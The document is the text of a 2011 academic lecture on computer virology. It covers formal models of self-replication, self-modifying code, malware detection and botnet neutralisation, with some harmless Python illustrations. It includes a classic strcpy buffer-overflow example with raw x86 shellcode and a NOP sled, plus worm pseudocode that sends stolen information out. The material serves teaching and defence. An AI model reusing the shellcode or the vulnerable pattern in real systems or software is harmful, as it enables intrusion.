An introduction to Computer Virology
Jean-Yves Marion
LORIA
INPL - ENSMN
Wednesday 23 February 2011
Some great stories
• Stuxnet
• Waledac, a botnet
• GhostNet
What is malware?
• Malware is a program with malicious intent
• Malware can be a virus, a worm, spyware, a botnet ...
• Giving a mathematical definition is difficult
• However, formal definitions are necessary in order to make progress
How do infections by malware work ?
Social engineering
Vulnerabilities
Infections
Mutations
Vulnerabilities : a buffer-overflow
#include <string.h>
void vulnerable(char *user_data) {
    char buffer[4];
    strcpy(buffer, user_data);  /* no bounds check */
}
Stack (from low to high addresses): buffer, saved EBP, saved EIP (return address), ...
vulnerable(«AAAAAAAAAAAAAAAA    (16 bytes of padding)
  \xec\xf2\xff\xbf    (overwrites the return address)
  \x90\x90 ... \x90\x90    (long NOP sled)
  \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)    (shellcode and its argument)
[Stack diagram after the overflow: \x90\x90 (NOP) bytes, with the addresses E000 and FFF0 marked]
The function returns to the address FFF0.
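The overwrite of the return address can be modeled without touching real memory. The following is a minimal Python sketch, not the C program of the slide: it assumes a simplified 32-bit little-endian frame laid out as buffer, saved EBP, saved EIP with no padding. The names make_frame, saved_eip, unchecked_copy and checked_copy, and the initial EBP and EIP values, are hypothetical. Unlike strcpy, the toy copy does not write a terminating NUL byte.

```python
import struct

BUFFER_SIZE = 4  # mirrors `char buffer[4]`


def make_frame(return_address):
    """Build a toy frame: buffer | saved EBP | saved EIP (4 bytes each)."""
    frame = bytearray(BUFFER_SIZE)
    frame += struct.pack("<I", 0xBFFFF300)      # saved EBP, arbitrary value
    frame += struct.pack("<I", return_address)  # saved EIP
    return frame


def saved_eip(frame):
    """Read the saved return address back from the toy frame."""
    return struct.unpack_from("<I", frame, BUFFER_SIZE + 4)[0]


def unchecked_copy(frame, data):
    """Copy like strcpy: the size of the buffer is never consulted."""
    for offset, byte in enumerate(data):
        frame[offset] = byte


def checked_copy(frame, data):
    """Refuse any input that does not fit in the buffer."""
    if len(data) > BUFFER_SIZE:
        raise ValueError("input longer than buffer")
    frame[:len(data)] = data


frame = make_frame(0x08048000)
# 4 bytes fill the buffer, 4 bytes cover the saved EBP, 4 bytes replace the saved EIP.
payload = b"AAAA" + b"BBBB" + struct.pack("<I", 0xFFF0)
unchecked_copy(frame, payload)
```

After the unchecked copy, saved_eip(frame) yields 0xFFF0 instead of the original return address, while checked_copy rejects the same payload.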
Bugs
• Data are programs
• Bugs are doors if they are exploitable
• A bug-free system is safe
0-day exploits
A bug-free system does not exist
• A buffer overflow transforms a program into a self-modifying program
Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.
• The obfuscation mechanism is automatically modified for each new distributed binary.
[Figure: a packed binary made of the original binary and the unpacking code, with the entry point (EP) and the original entry point (OEP) marked]
Source: Tripoux: Reverse-engineering of malware packers for dummies, Deepsec 2010
• For a human analyst, obfuscated code is very hard to understand
Win32.Swizzor Packer
Problem 2: Amount of information
[Figure from Tripoux: Reverse-engineering of malware packers for dummies, Deepsec 2010]
Protections: Self-Modification and Obfuscation
• For a human analyst, obfuscated code is very hard to understand: not every line of code is meaningful, and x86 semantics is very tricky.
• One problem is the lack of high-level abstractions to structure and understand obfuscated code.
What is malware?
• Infects systems by self-replication
• Mutation
• Protects itself
  • Obfuscation
  • Self-modification
• Detection
  • Undecidable
Why trace? (1/3)
Definition: binary analysis is
• program analysis
• where the program is unknown
⟹ we only have a binary blob
Reasons:
• indirect jumps ⟹ undecidable control flow
• indirect reads/writes ⟹ undecidable data flow
• self-modifying code ⟹ undecidable syntax
Outline
• Self-replication
• Self-modification
• Detection
  • Morphological detection
  • Behavioral detection
• Botnet neutralization
Foundation 1 : Self-Replication
Self-replicating Cellular automaton
Von Neumann (1952), Burks, Codd, Langton
Cohen’s formalization (1985)
[Embedded slide from the talk "Recursion theorems as a foundation of computer virology"]
Cohen’s Virus (1985)
• Consider a Turing machine M and a viral set V
• When M reads v ∈ V, M produces v′ ∈ V
• (M, V) is a description of a virus
[Tape diagram: v1 v2 ... vn followed by v′1 v′2 ... v′m]
Self-Replication
• A virus has self-replicating capacity
• Reflexive properties of programming languages
• Fixed point combinators (functional programming languages)
• Pointer mechanism to the program's own code: $0 in a shell script
• Program encoding (Ken Thompson, «Reflections on Trusting Trust», CACM 1984)
• Computability: Kleene's recursion theorem (1938)
A compilation point of view
A worm X scenario:
• An email attachment is opened through social engineering
• X scans for information
• X extracts a list of email addresses of targeted people
• X sends a copy of itself by email
Worm X specification
WormX(v, out) {
  info := extract(out);      // extract information
  send(«badguy», info);      // send information
  @bk := findAddress(out);   // find email addresses
  send(@bk, v);              // send worm X to @bk
}
How to compile Worm X?
Semantics and fixed point equations
Semantics:
⟦_⟧ : Programs × D∗ → D∗
where a value of D∗ is a system environment.
From the above example:
⟦send⟧([email protected], “Hello”, Out) = cons(cons([email protected], “Hello”), Out)
where Out is an output stream.
I Always Love You
Suppose that out is a system entry point. A specification of ILoveYou is:
love(v, out) {
  info := find(out);                                  // find information
  out := send(cons(“[email protected]”, nil), info);
  @bk := extract(out);                                // extract addresses
  out := send(@bk, v);                                // send virus to @bk
  return out;
}
We have to solve a fixed point equation:
⟦W⟧(out) = ⟦WormX⟧(W, out)
where W is a worm satisfying the specification WormX.
In the same way, v behaves as ILoveYou if ⟦v⟧(out) = ⟦love⟧(v, out).
Kleene’s recursion theorem
A general solution to fixed point equations is given by:
Theorem (Kleene (1938)). If p is a program, then there is a program e such that
⟦e⟧(x) = ⟦p⟧(e, x)
A solution of the ILoveYou equation
⟦v⟧(out) = ⟦love⟧(v, out)
Set v = e where p = love.
The Kleene fixed point is a solution of
⟦W⟧(out) = ⟦WormX⟧(W, out)
Self-replicating malware compiler:
There is a compiler Comp such that, for every worm specification Worm,
⟦Comp⟧(Worm) = W, where ⟦W⟧(out) = ⟦Worm⟧(W, out)
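The construction behind the recursion theorem can be tried on a harmless program. The sketch below is an illustration in Python, not the construction used in the talk: given the source text of a function p(self_source, x), it builds the text of a program e whose run function satisfies run(x) == p(e, x). The names TEMPLATE, kleene_fixed_point, run_program and P_SOURCE are hypothetical, and the example p only returns the text it receives.

```python
# Template of the fixed point e. The %s receives the source of p, and the
# two %r receive quoted copies of the template and of the source of p.
TEMPLATE = (
    "%s\n"
    "T = %r\n"
    "P = %r\n"
    "SELF = T %% (P, T, P)\n"
    "def run(x):\n"
    "    return p(SELF, x)\n"
)


def kleene_fixed_point(p_source):
    """Return the text of a program e such that run(x) == p(e, x).

    p_source must define a function p(self_source, x).
    """
    return TEMPLATE % (p_source, TEMPLATE, p_source)


def run_program(source, x):
    """Execute a program text and apply its run function to x."""
    namespace = {}
    exec(source, namespace)
    return namespace["run"](x)


# A harmless p: it only reports the program text and the input it was given.
P_SOURCE = "def p(self_source, x):\n    return (self_source, x)\n"

e = kleene_fixed_point(P_SOURCE)
received_source, received_input = run_program(e, 7)
```

Inside e, the variable SELF is rebuilt from the quoted template and is equal to the full text of e, which is how the program gains access to its own code without reading any file.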
Self-replicating compilers with mutations
If Worm is a program, then there is a program e such that
⟦e⟧(out) = ⟦Worm⟧(Mutate(e), out)
where Mutate is a code mutation procedure.
Self-replicating compiler with mutations:
There is a compiler Comp such that, for every worm specification Worm and mutation procedure Mutate,
⟦Comp⟧(Worm) = W, where ⟦W⟧(out) = ⟦Worm⟧(Mutate(W), out)
Some historical facts
• 1983: the first official virus, on Vax-PDP 11
• 1988: the first worm, which infects 6000 machines
• 1990: Dark Avenger mutation engine (Bulgaria)
• 1995: macro virus
• 2000: worm “I Love You”
• 2001: Palm Pilot virus
• 2004: cell phone viruses
References
• PhD thesis of F. Cohen
• L. Adleman (1988), who coined the word «virus»
• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)
A Virus is a Virus, Lwoff
Foundation 2: Self-modification
A simple self-modification
A simple decryption loop
[Diagram: a loop closed by jnz @b, with code waves 1 and 2 at levels n and n + 1]
Another example of self-modification
Proxy = { X := Read();
          eval(X); }
An external input is run.
An interpreter of a known or unknown language is used to execute some data.
Applications of self-modifying programs
• Malware mutations
• Code protection (digital rights)
• Compression and packers
• Just-in-time compilers
Analyzing self-modifying programs
• Complex to design and to analyze
• Program flow may change
• In usual semantics, program and data are separated: the semantics of a program P is defined by structural induction on P
• Axiomatic semantics by means of Hoare logic and separation logic (Myreen and Cai-Appel & al)
Dynamic analysis of self-modifying programs
• Instrument a program
• Monitor memory reads (R), memory writes (W) and memory execution (X)
• We follow nested self-modifications
• We detect some code protections
• We detect code patterns
  • Code decryption
  • Integrity checking
  • ...
ACProtect
Example (3/5)
• hostname packed with ACProtect
Themida
Example (4/5)
• hostname packed with Themida
Experiments with TraceSurfer
Experimental results 1/3
• Number of code waves detected over the whole set of binaries: max = 56 waves
• 95,613 binaries, 80% success rate, 1400 binaries/h
• TraceSurfer is based on Pin (Intel)
Typing systems
• Each memory cell m at step x has three levels: Exec(m,x), Read(m,x) and Write(m,x)
• If we execute the instruction at address m:
Exec(m,x+1) = Write(m,x)+1
• If the instruction at address m reads memory address m’:
Read(m’,x+1) = Exec(m,x)
• If the instruction at address m writes memory address m’:
Write(m’,x+1) = Exec(m,x)
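The level rules can be replayed on a recorded trace to count code waves. The sketch below is a toy model in Python, not the TraceSurfer implementation. It assumes that a written cell takes the execution level of the instruction that writes it, that all levels start at 0, and that a trace is a list of (address, reads, writes) tuples, one per executed instruction. The trace format and the names compute_levels, count_waves and TRACE are hypothetical.

```python
from collections import defaultdict


def compute_levels(trace):
    """Replay (address, reads, writes) events and return the three level maps."""
    exec_level = defaultdict(int)
    read_level = defaultdict(int)
    write_level = defaultdict(int)
    for address, reads, writes in trace:
        # Executing a cell puts it one level above the level that wrote it.
        exec_level[address] = write_level[address] + 1
        for target in reads:
            read_level[target] = exec_level[address]
        for target in writes:
            write_level[target] = exec_level[address]
    return exec_level, read_level, write_level


def count_waves(trace):
    """Number of code waves, taken as the highest execution level reached."""
    exec_level, _, _ = compute_levels(trace)
    return max(exec_level.values(), default=0)


# A two-instruction loop at addresses 0 and 1 decrypts cells 10 and 11,
# then the decrypted code at 10 writes cell 20, which is executed last.
TRACE = [
    (0, [10], [10]),
    (1, [], []),
    (0, [11], [11]),
    (1, [], []),
    (10, [], [20]),
    (11, [], []),
    (20, [], []),
]
```

On this trace the loop runs at level 1, the decrypted cells 10 and 11 at level 2, and cell 20 at level 3, so count_waves(TRACE) reports three waves.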
Related works
• TraceSurfer, based on Pin (Intel)
• BitBlaze (Berkeley): TEMU, VINE, ...
• DynamoRIO, Ether, Metasm
Malware detection
Malware detection by traditional detection
• A signature is a regular expression denoting a sequence of bytes
• Example: Worm.Y contains «Your mac is now under our control !»
• Signature: «Your * is now under our control»
• Signatures are constructed quasi-manually
• Vulnerable to code mutations and code obfuscations
• Because they are based on a low (machine code) level of abstraction
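The weakness of byte-level signatures can be seen on the Worm.Y example. The sketch below is a minimal illustration in Python, assuming that the wildcard in the signature is written as the regular expression `.*`. The sample byte strings, the XOR key and the names SIGNATURE, is_detected and xor_encode are hypothetical.

```python
import re

# Byte-level signature: the `*` of the slide is written as `.*` here.
SIGNATURE = re.compile(rb"Your .* is now under our control")


def is_detected(binary):
    """Return True when the signature occurs anywhere in the byte string."""
    return SIGNATURE.search(binary) is not None


def xor_encode(data, key):
    """Trivial mutation: XOR every byte with a one-byte key."""
    return bytes(byte ^ key for byte in data)


original = b"\x90\x90Your mac is now under our control !\x00"
variant = b"\x90\x90Your pc is now under our control !\x00"
mutated = xor_encode(original, 0x2A)
```

The wildcard covers the variant that changes only the target name, but the XOR-encoded copy no longer contains the byte sequence and goes undetected, although decoding it gives back the original bytes.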
Morphological analysis in a nutshell
Signatures are abstract flow graphs
Detection searches for signature subgraphs in an abstraction of the program flow graph
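Subgraph detection can be illustrated with a naive search. The sketch below is a brute-force stand-in in Python, not the algorithm of the morphological detector: it tries every injective placement of the signature nodes in the program graph and checks node labels and edges. The node labels ("inst", "jcc", "call", "ret"), the two small graphs and the name contains_signature are hypothetical, and the search is exponential, so it only suits tiny examples.

```python
from itertools import permutations


def contains_signature(labels, edges, sig_labels, sig_edges):
    """Return True if the signature graph embeds into the program graph.

    labels and sig_labels map node -> label; edges and sig_edges are sets
    of (source, target) pairs.
    """
    program_nodes = list(labels)
    signature_nodes = list(sig_labels)
    for image in permutations(program_nodes, len(signature_nodes)):
        mapping = dict(zip(signature_nodes, image))
        same_labels = all(
            labels[mapping[node]] == sig_labels[node] for node in signature_nodes
        )
        same_edges = all(
            (mapping[source], mapping[target]) in edges
            for source, target in sig_edges
        )
        if same_labels and same_edges:
            return True
    return False


# Abstract flow graph of a small program: a conditional jump with two branches.
PROGRAM_LABELS = {0: "inst", 1: "jcc", 2: "call", 3: "inst", 4: "ret"}
PROGRAM_EDGES = {(0, 1), (1, 2), (1, 3), (2, 4), (3, 4)}

# Signature: a conditional jump leading to a call, which leads to a return.
SIG_LABELS = {"a": "jcc", "b": "call", "c": "ret"}
SIG_EDGES = {("a", "b"), ("b", "c")}
# A different shape on the same labels: the jump goes straight to the return.
OTHER_SIG_EDGES = {("a", "c")}
```

The first signature is found along the path 1, 2, 4 of the program graph, while the second one is not, since the program has no edge from the conditional jump to the return.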
Automatic construction of signatures
Reduction of signatures by graph rewriting
Morphological detection : Results
• False negative
• No experiment on unknown malware
• Signatures with fewer than 18 nodes are potential false negatives
• Restricted signatures of 20 nodes are efficient
• Less than 3 seconds for signatures of 500 nodes
Conclusion about morphological detection
• Benchmarks are good
• Pros
  • More robust to local mutations and obfuscations
  • Easily detects variants of the same malware family
  • Tries to take program semantics into account
  • Quasi-automatic generation of signatures
• Cons
  • Difficult to determine statically the flow graph of self-modifying programs
  • Use of a combination of static and dynamic analysis
Reference
• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.
Behavioral analysis
• Monitor program interactions (sys calls, network calls, ...)
• Detection of program behavior from execution traces
• Functionalities are expressed at a high level
Trace automata
• Trace language of a program: generally undecidable.
• Approximation by a regular language: using trace collection or static analysis.
⟹ A trace automaton is a finite state approximation of some trace language.
[Figure: trace automaton whose transitions are labeled GetLogicalDriveStrings, GetDriveType, FindFirstFile, FindNextFile and IcmpSendEcho]
• Information leaks can be detected
• Static and dynamic analysis
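A trace automaton can be run directly on a recorded sequence of calls. The sketch below is a minimal Python illustration that reuses the call names of the figure. The states, the transitions and the choice of accepting state (a file scan followed by a network send, read here as a possible information leak) are hypothetical and are not taken from the figure.

```python
# Hypothetical transition table: (state, call) -> next state.
TRANSITIONS = {
    ("start", "GetLogicalDriveStrings"): "drives",
    ("drives", "GetDriveType"): "drives",
    ("drives", "FindFirstFile"): "files",
    ("files", "FindNextFile"): "files",
    ("files", "GetDriveType"): "drives",
    ("files", "IcmpSendEcho"): "sent",
}
ACCEPTING = {"sent"}


def accepts(trace):
    """Return True if the sequence of calls is recognized by the automaton."""
    state = "start"
    for call in trace:
        state = TRANSITIONS.get((state, call))
        if state is None:
            return False  # no transition for this call: the trace is rejected
    return state in ACCEPTING


leaking_trace = [
    "GetLogicalDriveStrings",
    "GetDriveType",
    "FindFirstFile",
    "FindNextFile",
    "FindNextFile",
    "IcmpSendEcho",
]
scan_only_trace = ["GetLogicalDriveStrings", "GetDriveType", "FindFirstFile"]
```

The first trace ends in the accepting state, while the scan without a network call is not accepted.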
Some works on behavioral analysis
• Martignoni et al., 2008, on multi-layered abstraction
• Jacob et al., 2009, on low-level functionalities, but with exponential-time detection
• Beaucamps, Gnaedig, Marion, RV 2010, on fast detection of high-level functionalities
Botnets
• Understanding malware at the network level, with the interaction between thousands of infected hosts.
• Reverse-engineering
• Provides a starting point for understanding a botnet (protocol, objectives, ...)
• Simulation and analytical modeling
• Large-scale in vitro experiments
Botnet neutralisation in the lab
[Figure: attack scenario with an attacker, sybils, spammers, repeaters, protectors and a WHITE C&C]
Spam sent by the botnet
Rlist infections for repeaters
Conclusions
Conclusion
• Mathematical definitions of malware with tools
• High level representation of binaries
• Abstract signatures that are robust with respect to obfuscations
• Experiments and theories
• Analysis tools combining static and dynamic analysis
• Detection and neutralization heuristics
High Security Lab @ Nancy
lhs.loria.fr
Telescope & honeypots
In vitro experiment clusters
Thanks !